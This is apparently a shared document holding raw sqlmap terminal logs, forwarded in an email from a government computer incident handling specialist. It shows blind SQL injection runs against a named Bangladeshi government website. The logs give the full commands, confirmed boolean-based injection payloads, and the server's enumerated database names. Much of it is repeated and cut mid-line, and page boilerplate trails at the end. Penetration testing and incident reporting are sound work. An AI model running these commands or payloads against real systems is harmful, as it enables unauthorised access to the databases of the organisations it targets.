Blind SQL

root@kali-1:~# sqlmap -u
"http://bangladesh.gov.bd/site/view/eservice-sector/%E0%A6%9C%E0%A6%BE
%E0%A6%A4%E0%A7%80%E0%A7%9F%20%E0%A6%B0%E0%A6%BE%E0%A6%9C%E0%A6%B8%E0%A7%8D
%E0%A6%AC%20%E0%A6%AC%E0%A7%8B%E0%A6%B0%E0%A7%8D%E0%A6%A1" -p lang --level 3 --
risk 3 --dbms=mysql --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201602140a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not
responsible for any misuse or damage caused by this program
[*] starting at 14:51:18
[14:51:18] [WARNING] you've provided target URL without any GET parameters (e.g.
www.site.com/article.php?id=1) and without providing any POST parameters through --
data option
do you want to try URI injections in the target URL itself? [Y/n/q] y
[14:51:20] [INFO] testing connection to the target URL
[14:51:20] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[14:51:21] [INFO] testing if the target URL is stable
[14:51:21] [INFO] target URL is stable
[14:51:21] [INFO] testing if URI parameter '#1*' is dynamic
[14:51:22] [WARNING] URI parameter '#1*' does not appear dynamic
[14:51:22] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
not be injectable
[14:51:22] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be
vulnerable to XSS attacks
[14:51:22] [INFO] testing for SQL injection on URI parameter '#1*'
[14:51:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:51:22] [WARNING] reflective value(s) found and filtering out
[14:51:30] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE
or HAVING clause' injectable (with --string="\u0986\u09df\u0995\u09b0 \u09a8\u09bf\
u09ac\u09a8\u09cd\u09a7\u09a8")
[14:51:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[14:52:00] [WARNING] there is a possibility that the target (or WAF) is dropping
'suspicious' requests
[14:52:00] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
going to retry the request(s)
[14:52:20] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext
parameter/(c)hange verbosity/(q)uit] S
[14:52:21] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause'
[14:54:21] [CRITICAL] connection timed out to the target URL or proxy
or GROUP BY clause (EXTRACTVALUE)'
GROUP BY clause (EXTRACTVALUE)'
or GROUP BY clause (UPDATEXML)'
GROUP BY clause (UPDATEXML)'
or GROUP BY clause'
[14:55:50] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[14:56:59] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[14:56:59] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE
(EXTRACTVALUE)'
[14:57:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[14:57:00] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
(EXTRACTVALUE)'
[14:57:00] [INFO] testing 'MySQL inline queries'
[14:57:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[14:57:36] [CRITICAL] considerable lagging has been detected in connection
response(s). Please use as high value for option '--time-sec' as possible (e.g. 10
or more)
[14:57:48] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[14:58:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[14:58:48] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:59:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[14:59:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[14:59:49] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[15:00:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[15:00:49] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
[15:01:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[15:01:29] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[15:01:59] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[15:02:02] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[15:02:05] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)'
[15:02:35] [INFO] testing 'MySQL AND time-based blind (ELT)'
[15:02:45] [INFO] testing 'MySQL OR time-based blind (ELT)'
[15:03:15] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE
ANALYSE (EXTRACTVALUE)'
[15:03:16] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[15:03:16] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace
(SELECT)'
[15:03:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:03:16] [INFO] automatically extending ranges for UNION query injection
technique tests as there is at least one other (potential) technique found
[15:03:16] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending the
range for current UNION query injection technique test
[15:03:17] [INFO] target URL appears to have 4 columns in query
[15:03:47] [WARNING] most probably web server instance hasn't recovered yet from
previous timed based payload. If the problem persists please wait for few minutes
and rerun without flag T in option '--technique' (e.g. '--flush-session --
technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-
sec=2')
[15:05:36] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[15:05:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:05:47] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[15:05:54] [INFO] checking if the injection point on URI parameter '#1*' is a false
positive
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)?
[y/N] n
sqlmap identified the following injection point(s) with a total of 78 HTTP(s)
requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://bangladesh.gov.bd:80/site/view/eservice-sector/%E0%A6%9C
%E0%A6%BE%E0%A6%A4%E0%A7%80%E0%A7%9F %E0%A6%B0%E0%A6%BE%E0%A6%9C%E0%A6%B8%E0%A7%8D
%E0%A6%AC %E0%A6%AC%E0%A7%8B%E0%A6%B0%E0%A7%8D%E0%A6%A1" AND 9563=9563 AND
"tEaT"="tEaT
---
[15:06:21] [INFO] testing MySQL
[15:06:21] [INFO] confirming MySQL
[15:06:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[15:06:22] [INFO] fetching database names
[15:06:22] [INFO] fetching number of databases
[15:06:22] [WARNING] running in a single-thread mode. Please consider usage of
option '--threads' for faster data retrieval
[15:06:22] [INFO] retrieved: 18
[15:06:24] [INFO] retrieved: information_schema
[15:06:51] [INFO] retrieved: a2iweb_db
[15:07:14] [INFO] retrieved: authorizations
[15:07:35] [INFO] retrieved: ecommunication
[15:07:57] [INFO] retrieved: formbuilder
[15:08:14] [INFO] retrieved: mysql
[15:08:22] [INFO] retrieved: ness
[15:08:29] [INFO] retrieved: npf_bari
[15:08:42] [INFO] retrieved: npf_ctg
[15:08:54] [INFO] retrieved: npf_khul
[15:09:08] [INFO] retrieved: npf_syl
[15:09:20] [INFO] retrieved: npf_sylhettest
[15:09:41] [INFO] retrieved: npfministry
[15:10:00] [INFO] retrieved: npfministryadmin
[15:10:24] [INFO] retrieved: org056101030026000000
[15:11:25] [INFO] retrieved: performance_schema
[15:11:50] [INFO] retrieved: test
available databases [18]:
[*] a2iweb_db
[*] authorizations
[*] ecommunication
[*] formbuilder
[*] information_schema
[*] mysql
[*] ness
[*] npf_bari
[*] npf_ctg
[*] npf_khul
[*] npf_syl
[*] npf_sylhettest
[*] npfministry
[*] npfministryadmin
[*] org056101030026000000
[*] org103000030026000000
[*] performance_schema
[*] test
[15:11:57] [INFO] fetched data logged to text files under

'/root/.sqlmap/output/bangladesh.gov.bd'
[*] shutting down at 15:11:57
root@kali-1:~#
============================
"http://bangladesh.gov.bd/site/view/eservice-sector/%E0%A6%AE%E0%A6%A8%E0%A7%8D
%E0%A6%A4%E0%A7%8D%E0%A6%B0%E0%A6%BF%E0%A6%AA%E0%A6%B0%E0%A6%BF
%E0%A6%B7%E0%A6%A6%20%E0%A6%AC%E0%A6%BF%E0%A6%AD%E0%A6%BE%E0%A6%97" -p lang --
level 3 --risk 3 --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201602140a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
data option
not be injectable
or HAVING clause' injectable (with --string="\u0987-\u09b8\u09c7\u09ac\u09be\
u09b0 \u09a4\u09be\u09b2\u09bf\u0995\u09be : \u09ae\u09a8\u09cd\u09a4\u09cd\u09b0\
u09bf\u09aa\u09b0\u09bf\u09b7\u09a6 \u09ac\u09bf\u09ad\u09be\u0997")
or GROUP BY clause'
GROUP BY clause'
or GROUP BY clause'
[15:09:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:09:36] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[15:09:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or
HAVING clause'
[15:09:40] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
HAVING clause'
[15:09:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or
HAVING clause (IN)'
[15:09:42] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
HAVING clause (IN)'
[15:09:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause
(XMLType)'
[15:09:45] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause
(XMLType)'
(UTL_INADDR.GET_HOST_ADDRESS)'
(UTL_INADDR.GET_HOST_ADDRESS)'
(CTXSYS.DRITHSX.SN)'
(CTXSYS.DRITHSX.SN)'
[15:09:51] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[15:09:51] [INFO] testing 'Firebird OR error-based - WHERE or HAVING clause'
(EXTRACTVALUE)'
(EXTRACTVALUE)'
[15:09:59] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[15:09:59] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter
replace'
[15:09:59] [INFO] testing 'Oracle error-based - Parameter replace'
[15:11:59] [INFO] testing 'PostgreSQL inline queries'
[15:12:18] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:12:20] [INFO] testing 'Oracle inline queries'
[15:12:22] [INFO] testing 'SQLite inline queries'
[15:12:23] [INFO] testing 'Firebird inline queries'
or more)
[15:13:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:14:27] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[15:14:57] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[15:15:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:15:27] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE -
comment)'
[15:15:57] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[15:16:27] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[15:16:38] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[15:20:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:20:28] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[15:20:30] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[15:20:30] [INFO] testing 'PostgreSQL OR time-based blind (heavy query)'
[15:20:30] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:20:31] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy
query)'
[15:20:31] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy
query)'
[15:20:31] [INFO] testing 'Oracle AND time-based blind'
[15:20:31] [INFO] testing 'Oracle OR time-based blind'
[15:20:32] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[15:20:32] [INFO] testing 'Oracle OR time-based blind (heavy query)'
[15:20:32] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[15:20:32] [INFO] testing 'IBM DB2 OR time-based blind (heavy query)'
[15:20:33] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[15:20:33] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
(SELECT)'
[15:20:33] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[15:20:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter
replace'
[15:20:33] [INFO] testing 'Oracle time-based blind - Parameter replace
(DBMS_LOCK.SLEEP)'
[15:20:33] [INFO] testing 'Oracle time-based blind - Parameter replace
(DBMS_PIPE.RECEIVE_MESSAGE)'
[15:20:33] [WARNING] using unescaped version of the test because of zero knowledge
of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[15:20:35] [WARNING] applying generic concatenation with double pipes ('||')
sec=2')
positive
[y/N] n
requests:
---
Payload: http://bangladesh.gov.bd:80/site/view/eservice-sector/%E0%A6%AE
%E0%A6%A8%E0%A7%8D%E0%A6%A4%E0%A7%8D%E0%A6%B0%E0%A6%BF%E0%A6%AA%E0%A6%B0%E0%A6%BF
%E0%A6%B7%E0%A6%A6 %E0%A6%AC%E0%A6%BF%E0%A6%AD%E0%A6%BE%E0%A6%97" AND 2876=2876 AND
"PBzB"="PBzB
---
[15:26:20] [INFO] retrieved: form
builder
[*] a2iweb_db
[*] authorizations
[*] ecommunication
[*] formbuilder
[*] mysql
[*] ness
[*] npf_bari
[*] npf_ctg
[*] npf_khul
[*] npf_syl
[*] npf_sylhettest
[*] npfministry
[*] org056101030026000000
[*] org103000030026000000
[*] test

root@kali-1:~#
Regards,
Debashis Pal
Computer Incident Handling Specialist
Leveraging ICT Project (World Bank Funded Project)
Ministry of Posts, Telecommunication and Information Technology
Mob : +88-01872558555
-----Computer Incident Handling Specialist/BCC wrote: -----

To: Computer Incident Helpdesk & Administration Associate/BCC@BCC
From: Computer Incident Handling Specialist/BCC
Date: 03/27/2016 03:22PM
Subject: Re: bangladesh SQL [parameter bases] -- blind boolena
"http://bangladesh.gov.bd/site/view/eservice-sector/%E0%A6%9C%E0%A6%BE
%E0%A6%A4%E0%A7%80%E0%A7%9F%20%E0%A6%B0%E0%A6%BE%E0%A6%9C%E0%A6%B8%E0%A7%8D
%E0%A6%AC%20%E0%A6%AC%E0%A7%8B%E0%A6%B0%E0%A7%8D%E0%A6%A1" -p lang --level 3 --
risk 3 --dbms=mysql --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201602140a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
data option
not be injectable
or HAVING clause' injectable (with --string="\u0986\u09df\u0995\u09b0 \u09a8\u09bf\
u09ac\u09a8\u09cd\u09a7\u09a8")
or GROUP BY clause'
GROUP BY clause'
or GROUP BY clause'
(EXTRACTVALUE)'
(EXTRACTVALUE)'
or more)
(SELECT)'
sec=2')
positive
[y/N] n
requests:
---
Payload: http://bangladesh.gov.bd:80/site/view/eservice-sector/%E0%A6%9C
%E0%A6%BE%E0%A6%A4%E0%A7%80%E0%A7%9F %E0%A6%B0%E0%A6%BE%E0%A6%9C%E0%A6%B8%E0%A7%8D
%E0%A6%AC %E0%A6%AC%E0%A7%8B%E0%A6%B0%E0%A7%8D%E0%A6%A1" AND 9563=9563 AND
"tEaT"="tEaT
---
[15:07:57] [INFO] retrieved: formbuilder
[*] a2iweb_db
[*] authorizations
[*] ecommunication
[*] formbuilder
[*] mysql
[*] ness
[*] npf_bari
[*] npf_ctg
[*] npf_khul
[*] npf_syl
[*] npf_sylhettest
[*] npfministry
[*] org056101030026000000
[*] org103000030026000000
[*] test

root@kali-1:~#

Blind SQL

Uploaded by

Copyright:

Available Formats

You might also like

Blind SQL

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Blind SQL

Uploaded by

Copyright:

Available Formats

root@kali-1:~# sqlmap -u

[*] starting at 14:51:18

[15:11:57] [INFO] fetched data logged to text files under

[*] shutting down at 15:11:57

[*] starting at 15:01:00

[15:30:48] [INFO] fetched data logged to text files under

[*] shutting down at 15:30:48

-----Computer Incident Handling Specialist/BCC wrote: -----

[*] starting at 14:51:18

[15:11:57] [INFO] fetched data logged to text files under

[*] shutting down at 15:11:57

You might also like